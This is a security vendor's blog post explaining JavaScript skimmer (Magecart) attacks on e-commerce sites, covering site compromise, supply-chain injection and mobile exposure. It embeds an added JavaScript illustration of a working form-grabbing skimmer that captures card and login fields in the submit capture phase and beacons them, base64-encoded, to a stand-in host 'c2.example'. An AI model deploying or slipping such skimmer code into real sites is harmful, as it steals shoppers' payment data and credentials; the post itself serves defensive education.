Ted McKendall

The past few years have seen the emergence and rapid growth of a new threat to websites: Javascript skimmers, also called Javascript sniffers. This week we shall cover some more general observations about Javascript skimmers, and part two next week will get into a bit more detail about what Trusted Knight has seen in the course of our research.


1. Javascript skimmer attacks are actually a hybrid of server-side attack and endpoint malware.

While the initial compromise is usually of a web server, where the attacker implants malicious Javascript, the code itself behaves more like endpoint malware such as form-grabbing keyloggers. Keyloggers and banking trojans, still among the most common forms of malware affecting end users, evolved over a decade ago as a way to evade the security infrastructure banks and financial institutions had begun placing around their online platforms. Rather than attack the online banking site directly, form-grabbing malware infects the bank’s customers and steals credentials and other data from their web browsers as they access the banking site. Javascript skimmers work the same way: the Javascript runs locally in the user’s web browser and skims a copy of sensitive form data as the user interacts with the page, most often payment card data but also login credentials and other personal information. The data is then exfiltrated directly from the user’s computer to the criminal’s command and control (C2) server. The theft therefore happens outside the visibility of the business, and outside the security controls and defenses it would typically have around its web server infrastructure.
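As an added illustration, not code from the original post or from Trusted Knight, the core of a form-grabbing skimmer is shown below reduced to plain functions, so the mechanics the paragraph describes (pick the sensitive fields, encode them, beacon them to the C2, and, on the defender’s side, decode a captured beacon) can be run and inspected under Node. The field-name pattern, the C2 host c2.example and the sample checkout form are assumptions constructed for this example; the browser wiring at the bottom only runs when a document object exists.

```javascript
// Added illustration (not Trusted Knight's code): the core of a form-grabbing
// skimmer as pure functions. Field pattern, C2 host and sample form are
// assumptions made for this example.

// Field names a skimmer typically targets: card data, credentials, contact info.
const SENSITIVE_FIELD = /(card|ccnum|cvv|cvc|exp|pass|email|phone|addr|zip|name)/i;

// Pick the fields worth stealing from a list of {name, value} form entries.
function grabSensitiveFields(entries) {
  const out = {};
  for (const { name, value } of entries) {
    if (name && SENSITIVE_FIELD.test(name) && value !== '') out[name] = value;
  }
  return out;
}

// Skimmers rarely send plaintext; base64 (often with a further XOR or reversal)
// is enough to defeat a casual look at the browser's network tab.
function encodePayload(obj) {
  return Buffer.from(JSON.stringify(obj), 'utf8').toString('base64');
}

// The classic low-noise exfil channel: a GET for a "pixel" on the C2 host.
// Nothing here touches the victim site's own server, so its logs never see it.
function beaconUrl(c2, payload) {
  return `https://${c2}/pixel.gif?d=${encodeURIComponent(encodePayload(payload))}`;
}

// Defender side: given a captured beacon URL, recover what was stolen.
function decodeBeacon(url) {
  const d = new URL(url).searchParams.get('d');
  return JSON.parse(Buffer.from(d, 'base64').toString('utf8'));
}

// Browser wiring, executed only when a DOM exists. Under Node this block is
// skipped, which is what lets the file run stand-alone as a demonstration.
if (typeof document !== 'undefined') {
  document.addEventListener('submit', (ev) => {
    const entries = Array.from(ev.target.elements || [])
      .map((el) => ({ name: el.name, value: el.value }));
    const stolen = grabSensitiveFields(entries);
    if (Object.keys(stolen).length) new Image().src = beaconUrl('c2.example', stolen);
  }, true); // capture phase: runs before the site's own submit handlers
}

// Stand-alone demo on a constructed checkout form (sample data, not real).
function demo() {
  const form = [
    { name: 'cardnumber', value: '4111111111111111' },
    { name: 'cvv', value: '123' },
    { name: 'exp', value: '12/29' },
    { name: 'email', value: 'victim@example.test' },
    { name: 'newsletter', value: 'on' },   // not interesting to the skimmer
    { name: 'csrf_token', value: 'abc' },  // name does not match, skipped
  ];
  const url = beaconUrl('c2.example', grabSensitiveFields(form));
  return { url, recovered: decodeBeacon(url) };
}

console.log(demo());
```

Two things in the block are worth noticing from the defender's side: the submit listener is registered in the capture phase, so it sees the data before the site's own handlers, and the beacon is a plain image request to a host the site never references, which is exactly the kind of outbound connection a Content-Security-Policy with a reporting endpoint makes visible.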


2. Often still called “Magecart” these Javascript skimmer attacks have spread beyond their origins.

The term “Magecart” originally referred to the malware kit used by one of the first groups to popularize this technique, which used it to great effect on websites running the Magento ecommerce platform. As other groups copied the technique, usage of the term grew, and it is now sometimes applied to Javascript skimmers that do not target Magento at all. In fact Javascript skimmers have been seen targeting many popular platforms, including Magento, WooCommerce, WordPress, BigCommerce, Shopify, and others.


3. Javascript skimmers can be the result of an attacker compromising your website…

Javascript skimmers are typically small pieces of Javascript added to a website. In many cases an attacker exploits a vulnerability in the website’s framework or platform, but rather than break in and steal data directly, he leaves a skimmer behind, modifying one or a few of the site’s files with just a line or two of code that loads his malicious script. Every user who visits the site then not only views the intended content but also downloads and runs a copy of the malicious Javascript.


4. …But are often the result of a software supply chain compromise

Most websites hit by Javascript skimmers are compromised through third-party code rather than their own. Over two-thirds of websites include code from third-party sources – analytics tools, review widgets, chat providers, shopping carts, loyalty services, open-source libraries and utilities, and so on; it is a reality of the modern web application. But every third-party source is another vector an attacker can compromise in order to inject his Javascript skimmer into your website. This is called a supply-chain attack because, like a real-world supply-chain attack, a single compromise cascades to every downstream customer, which is a very effective way for criminals to scale. For example, a compromise of the PrismWeb platform injected a Javascript skimmer into over 200 campus book and merchandise online stores in the US and Canada, and an attack on the e-commerce platform Volusion affected over 6600 websites.


5. Javascript skimmers can affect both mobile and desktop/laptop users

Given the emphasis on Javascript, one might assume the main targets are desktop and laptop users with a full web browser. Not so – mobile users can be equally affected. Anyone using a mobile browser is exposed exactly as a desktop or laptop user is. Furthermore, many mobile apps are thin shells that load most of their content from a website, so if the website is serving a Javascript skimmer to browsers it serves the same script to the app, which runs it. Such was the case with the British Airways website when it was hit with a Javascript skimmer, disclosed in September 2018.

Next week’s post will cover more on this topic. Meanwhile, to learn what Protector Air is doing to defend against this threat, contact us.
